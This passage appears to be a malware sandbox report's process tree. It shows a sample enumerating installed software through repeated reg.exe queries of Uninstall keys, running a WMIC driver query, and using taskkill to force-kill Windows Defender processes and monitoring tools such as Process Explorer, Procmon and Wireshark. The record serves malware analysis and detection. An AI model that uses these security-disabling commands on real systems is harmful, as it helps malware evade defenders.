    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:3560
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:3992
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:2164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:3844
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:1760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1328
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:3560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:4108
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:4160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:4180
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4200
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4236
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:4256
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4272
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4292
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4356
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:4388
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4408
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:4468
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4544
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4600
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4620
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4676
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4696
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4716
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4736
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4904
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4980
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:5036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:5056
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:5112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:2724
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:2544
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:4172
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4184
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4248
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4256
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4320
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4352
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4312
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4372
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4484
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4544
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4704
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4784
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4844
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:4996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:5044
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:1536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4120
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5068
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4168
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4236
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4280
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4356
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4284
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4472
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4376
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4604
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4784
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4772
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4884
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5008
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:2164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4108
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4132
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:2160
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4284
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4764
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2232
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:5056
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4132
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:4472
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4980
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4444
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5152
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5212
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5308
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5368
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:5600